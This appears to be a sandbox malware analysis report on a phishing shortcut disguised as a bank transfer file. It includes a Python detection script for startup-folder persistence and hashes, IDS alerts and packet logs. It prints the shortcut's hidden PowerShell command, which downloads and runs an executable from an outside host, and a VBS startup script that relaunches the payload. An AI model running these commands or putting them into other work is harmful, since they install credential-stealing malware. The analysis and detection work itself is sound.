                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1305263
                                                                      Entropy (8bit):7.126088648073379
                                                                      Encrypted:false
                                                                      SSDEEP:24576:SRmJkcoQricOIQxiZY1iabicPx38FUk+0:HJZoQrbTFZY1iabXMakz
                                                                      MD5:AA6F514A7AFA81E26BCF612923EA483C
                                                                      SHA1:2033A141125D0A0989EF3C0002833BACF0A390C7
                                                                      SHA-256:997C285947AE58D2ACFB5C0B32ADFA7288168FAA5AA691D094F5FFD9A9728A3A
                                                                      SHA-512:F8D0475754589E9D57462AC8A13820132714FF682A8655E1CA95D037FB2E65F62815A79AF855B4E2707CF9CB5A9EE35E262CBA4D277B90AD823BCFE4D1D5D335
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):255488
                                                                      Entropy (8bit):6.393938792111984
                                                                      Encrypted:false
                                                                      SSDEEP:6144:doyZbDFiQod72ZcwXA3S1kxC4qrseWDHg19G6AU4ZH:dTxi72aNC1yqIPwbAU4h
                                                                      MD5:074728216283AD6FA8777C82DFBB55DE
                                                                      SHA1:92DF63CBAB81835463BA54F6791BD6A2944646A9
                                                                      SHA-256:D63FB30628DC1C5DAB8172821C1A68765ACF307C695732A3BF8111095EB177BB
                                                                      SHA-512:260C4965D0AD3DAC2E2F35F05EDEF93B8F9581830F7F00ADC73413C05C01E4864B4D5BC7A6A6E7B53C3022ABBA60A5DC524F43ED5BD096D203ABD7191C493900
                                                                      Malicious:false
                                                                      Preview:...ZDSK4\J4X..ZG.K4XJ4XS.ZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZG.K4XD+.]I.N.j.Y..y.!34s;F7-F9>i9&=%[,jV=s;/)s"Zx.{.s$5#6e9U@.XSIZGSKd.J4.RJZ;.yRXJ4XSIZG.K6YA5SSI.DSK<XJ4XSI$.PK4xJ4XSMZGS.4Xj4XSKZGWK4XJ4XSMZGSK4XJ4.WIZESK4XJ4ZS..GS[4XZ4XSIJGS[4XJ4XSYZGSK4XJ4XSIv.PK{XJ4XSMZ.VK4XJ4XSIZGSK4XJ4XSIzCSG4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZgSK<XJ4XSIZGSK4Pj4X.IZGSK4XJ4XSg."+?4XJ..PIZgSK4.I4XQIZGSK4XJ4XSIZGsK48dF+!*ZGS.1XJ4XWIZASK4.I4XSIZGSK4XJ4X.IZ.}9Q4%WXSEZGSK.\J4ZSIZ.PK4XJ4XSIZGSK4.J4.SIZGSK4XJ4XSIZGS+.[J4XSI.GSK6XO4..KZ..J4[J4XRIZASK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XJ4XSIZGSK4XW....m.If@V_.o. .H..Y..*..H.^.#^....W...mA^..Z.\{..=...2.C1!K.....3@EV"g/|F;.N....y'...U%."...-{.)Uo.q..uj....;,.l..=..0$Yv+D(?,t.2-U*#.Z.HZGSK........+.nuI;Fg["....~& ....54XJPXSI(GSKUXJ4.SIZ(SK46J4X-IZG-K4X.4XS.ZGS|4XJ.XSI7GSK.XJ4&SIZ..D;...1 .GSK4X...c.7...k.}....+.-.V`..7....Ng.E\.$.....:._..^.,Uhz.M5^WLX@WH8eD....{EWO1ZM0[_tT....y...p..:..g".5ZGSK4X.4X.IZG..4.J4X.I.G..4XJ..S.Z.S..J
                                                                      Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1305263
                                                                      Entropy (8bit):7.126088648073379
                                                                      Encrypted:false
                                                                      SSDEEP:24576:SRmJkcoQricOIQxiZY1iabicPx38FUk+0:HJZoQrbTFZY1iabXMakz
                                                                      MD5:AA6F514A7AFA81E26BCF612923EA483C
                                                                      SHA1:2033A141125D0A0989EF3C0002833BACF0A390C7
                                                                      SHA-256:997C285947AE58D2ACFB5C0B32ADFA7288168FAA5AA691D094F5FFD9A9728A3A
                                                                      SHA-512:F8D0475754589E9D57462AC8A13820132714FF682A8655E1CA95D037FB2E65F62815A79AF855B4E2707CF9CB5A9EE35E262CBA4D277B90AD823BCFE4D1D5D335
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5407
                                                                      Entropy (8bit):3.5105508922189017
                                                                      Encrypted:false
                                                                      SSDEEP:48:NHuNdDkWDa0+/EIlHJwSogZo2U+/EIlLwSogZoi1:NHYBD+/EI5HM+/EIfHp
                                                                      MD5:1ECEC74ABDE16C2B31F1F016C69C67C4
                                                                      SHA1:1A436EADC904F0D94A2FD835214950177844EF05
                                                                      SHA-256:53F06443F7B7EDDF2D9668C2649E57B1AFDAA1D538E5DC6DFF9D53427E4C8A4B
                                                                      SHA-512:FED88A983F4D51213417F47BF7633BD938481231EA2CC614E4F7E4A385FD2C8B2C6F199D231758B81046315A005BF06FE13A3D7A2DE10E8B67B297D19C7FCFAB
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...,...W....|......K...................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....!..W....|.........2.....;Y.D .RTGS-W~1.LNK..f......EW.5;Y.D..........................3...R.T.G.S.-.W.B.-.A.B.S.-.2.4.0.7.3.0.-.N.E.W...l.n.k.......c...............-.......b...........k.......C:\Users\user\Desktop\RTGS-WB-ABS-240730-NEW.lnk../.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\purchas_geo_NJF_icon.ico..........................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o..................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5407
                                                                      Entropy (8bit):3.5105508922189017
                                                                      Encrypted:false
                                                                      SSDEEP:48:NHuNdDkWDa0+/EIlHJwSogZo2U+/EIlLwSogZoi1:NHYBD+/EI5HM+/EIfHp
                                                                      MD5:1ECEC74ABDE16C2B31F1F016C69C67C4
                                                                      SHA1:1A436EADC904F0D94A2FD835214950177844EF05
                                                                      SHA-256:53F06443F7B7EDDF2D9668C2649E57B1AFDAA1D538E5DC6DFF9D53427E4C8A4B
                                                                      SHA-512:FED88A983F4D51213417F47BF7633BD938481231EA2CC614E4F7E4A385FD2C8B2C6F199D231758B81046315A005BF06FE13A3D7A2DE10E8B67B297D19C7FCFAB
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...,...W....|......K...................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....!..W....|.........2.....;Y.D .RTGS-W~1.LNK..f......EW.5;Y.D..........................3...R.T.G.S.-.W.B.-.A.B.S.-.2.4.0.7.3.0.-.N.E.W...l.n.k.......c...............-.......b...........k.......C:\Users\user\Desktop\RTGS-WB-ABS-240730-NEW.lnk../.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o.........%SystemDrive%\Users\admin\Desktop\purchas_geo_NJF_icon.ico..........................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s._.g.e.o._.N.J.F._.i.c.o.n...i.c.o..................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):3.387474353478796
                                                                      Encrypted:false
                                                                      SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1QlAWB7TilSmlAnriIM8lfQVn:DsO+vNlDQ1Ql17WlGmA2n
                                                                      MD5:E6A749EDB8A34D16433880A6AC1257FF
                                                                      SHA1:C98E85B1E9B6003C942C57555AC3C576863A51F9
                                                                      SHA-256:2B56E40B8D7D32AB500654F51B793F38AAE90A3DD24050E9094A0AA2DF84FE87
                                                                      SHA-512:96D078951A716466D26F76FEC2CBFE47B32FB0F4CEEE5157F83D2CB60D56B8395DD3E12F4CB24340CAB99C8E33C87AFE644D935E77791E882F8073842DA5084F
                                                                      Malicious:true
                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.u.n.s.p.a.t.t.e.r.e.d.\.r.e.c.o.m.p.l.a.i.n.t...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
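The 292-byte file above is the persistence script behind the report's "Drops VBS files to the startup folder" signature. Its preview is UTF-16LE text with the NUL bytes rendered as dots; decoded it reads `Set WshShell = CreateObject("WScript.Shell")`, then `WshShell.Run "C:\Users\engineer\AppData\Local\unspattered\recomplaint.exe", 1`, then `Set WshShell = Nothing`. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it decodes such a script whatever its encoding (BOM-less UTF-16 defeats an ASCII-only grep or YARA string), pulls out the `WScript.Shell.Run` target, and flags a target that lives under a user-writable path. The copy of the script is constructed from the preview; the LF line terminator, the set of "user-writable" directories and the Startup-folder extension list are assumptions, not values from the report.

```python
import re
from pathlib import Path, PureWindowsPath

# Constructed copy of the dropped startup script. The report's preview shows every
# character followed by a NUL (UTF-16LE, no BOM) and one two-byte terminator per
# line; LF is assumed for that terminator. Encoded, this is 292 bytes, the size the
# report gives for the dropped file.
DROPPED_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\engineer\\AppData\\Local\\unspattered\\recomplaint.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")


def decode_script(raw: bytes) -> str:
    """Decode a dropped script: UTF-16 with BOM, BOM-less UTF-16 (NUL every other byte), or 8-bit."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    probe = raw[:64]
    if len(probe) >= 4:
        odd_nuls = probe[1::2].count(0) / len(probe[1::2])
        even_nuls = probe[0::2].count(0) / len(probe[0::2])
        if odd_nuls > 0.8:
            return raw.decode("utf-16-le", errors="replace")
        if even_nuls > 0.8:
            return raw.decode("utf-16-be", errors="replace")
    return raw.decode("utf-8", errors="replace")


# .Run "<target>" or .Run <target>; the object variable is attacker-chosen, so the
# pattern does not anchor on the name 'WshShell'.
RUN_TARGET = re.compile(r'\.Run\s+(?:"([^"]+)"|([^,\r\n]+))', re.IGNORECASE)

# Launch locations a legitimate Startup entry rarely points at (assumed list; tune it).
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Local|Roaming|LocalLow)|Users\\Public|ProgramData|Temp)\\", re.IGNORECASE
)


def triage_startup_script(raw: bytes) -> dict:
    """Decode one startup script and report what it launches and why that is suspicious."""
    text = decode_script(raw)
    targets = [quoted or bare.strip() for quoted, bare in RUN_TARGET.findall(text)]
    reasons = []
    if 'CreateObject("WScript.Shell")' in text:
        reasons.append("instantiates WScript.Shell")
    for target in targets:
        if USER_WRITABLE.search(target):
            reasons.append(f"launches {target} from a user-writable location")
        if target.lower().endswith((".exe", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")):
            reasons.append(f"target is an executable or script: {PureWindowsPath(target).name}")
    suspicious = bool(targets) and any("user-writable" in r for r in reasons)
    return {"text": text, "targets": targets, "reasons": reasons, "suspicious": suspicious}


def scan_startup_folder(folder: Path) -> list:
    """Apply the triage to every script in a Startup folder, e.g.
    %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (assumed extension list)."""
    hits = []
    for path in folder.glob("*"):
        if path.suffix.lower() in (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"):
            result = triage_startup_script(path.read_bytes())
            if result["suspicious"]:
                hits.append((path, result["targets"]))
    return hits


if __name__ == "__main__":
    result = triage_startup_script(DROPPED_VBS)
    print(result["text"])
    for reason in result["reasons"]:
        print("-", reason)
```

`scan_startup_folder` is the form you would run on a live host or a mounted image; everything else runs offline on the constructed bytes. Note that the extracted target is a fixed profile path, so the indicator to hunt for on other hosts is the `\AppData\Local\unspattered\recomplaint.exe` suffix rather than the full string.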
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):45984
                                                                      Entropy (8bit):6.16795797263964
                                                                      Encrypted:false
                                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
• Filename: shipping documents.exe, Detection: malicious
• Filename: shipping documents.exe, Detection: malicious
• Filename: autorization Letter.exe, Detection: malicious
• Filename: rMT103SwiftCopyoFPayment.exe, Detection: malicious
• Filename: Shipping Document.exe, Detection: malicious
• Filename: COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe, Detection: malicious
• Filename: DHL- CBJ520818836689.pdf.exe, Detection: malicious
• Filename: DHL- CBJ520818836689.exe, Detection: malicious
• Filename: Shipping documents.exe, Detection: malicious
• Filename: Shipping doc.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                      Process:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1141
                                                                      Entropy (8bit):4.442398121585593
                                                                      Encrypted:false
                                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                      Malicious:false
                                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
File type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sun Nov 17 02:57:57 2019, mtime=Sun Nov 17 02:57:57 2019, atime=Wed Oct 29 01:16:41 2014, length=478720, window=hide
Entropy (8bit): 3.5372984242646197
TrID:
• Windows Shortcut (20020/1) 100.00%
File name: RTGS-WB-ABS-240730-NEW.lnk
File size: 2'332 bytes
MD5: 82937aae96fa6a40b59703eea97ce1ef
SHA1: d23b17711e2e65609c9973d6f03dde3d2acb3568
SHA256: d820d9f270915fc81bedefd16bf7b8a20cb88a4d1e55d8566b9367fa494ac356
SHA512: f3d66ad7d89da4bd494f173506ced0fe46404a786876e4664658e0db4b8075a18e0579f4bb5319aba9dee9338b1f64782a2b3f1f4d7640187b4dfbc0d3240bc8
SSDEEP: 24:8WU+RuRgkkCtvtUhKBUW1vvAlPWkp+/CWIiAGfcC7KTuUMkWU5T10lDkiO+I10lC:8WU+hgltqlnrWKTuHwADkixD3a33F
TLSH: 8841AE042BF55B24F7B3AFB9A8B962029933BC49DE119F8F0190C5465C61A14E864F3B
File Content Preview: L..................F.@.. ...r..2....r..2.......`.....N...........................P.O. .:i.....+00.../C:\...................V.1......Yl...Windows.@........C.l.Yl.....).........................W.i.n.d.o.w.s.....Z.1......Y....System32..B........C.l.Y......7.
Icon Hash: 74f0e4e4e4e1e1ed

General

Relative Path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
Icon location: C:\Users\admin\Desktop\purchas_geo_NJF_icon.ico
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T10:38:56.228125+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 60913 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:33.684199+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 61255 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:47.577844+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 60905 | 208.91.198.176 | 587 | TCP
2024-09-27T10:39:50.515013+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 60912 | 208.91.198.176 | 587 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
                                                                      Sep 27, 2024 10:39:13.307288885 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.307322979 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.307334900 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.307459116 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.307473898 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.307508945 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.307517052 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.307547092 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.307559013 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.308012009 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308027029 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308073997 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.308080912 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308114052 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.308371067 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308384895 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308424950 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.308433056 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.308455944 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.308466911 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.309308052 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.309320927 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.309370041 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.309376955 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.309411049 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.310303926 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.310317993 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.310360909 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.310369015 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.310401917 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.339905024 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.339921951 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.339982986 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.340014935 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.340046883 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.340059042 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.340081930 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.384366989 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.399728060 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.399753094 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.399818897 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.399892092 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.399893999 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.399908066 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.399975061 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.400532961 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400553942 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400628090 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.400636911 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400844097 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400862932 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400896072 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.400902987 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.400924921 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.401572943 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.401587009 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.401618958 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.401628017 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.401638985 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.402760983 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.402780056 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.402806997 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.402813911 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.402834892 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.432204962 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432228088 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432348013 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.432359934 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432692051 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432710886 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432756901 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.432765007 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.432776928 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.478108883 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492238045 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492264032 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492332935 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492345095 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492392063 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492418051 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492433071 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492492914 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492501020 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492539883 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492930889 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492947102 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.492985964 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.492991924 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.493036985 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.493036985 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.493267059 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.493282080 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.493321896 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.493329048 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.493354082 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.493391991 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.493949890 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.493968010 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.494009018 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.494014978 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.494040012 CEST61245443192.168.2.6176.99.3.36
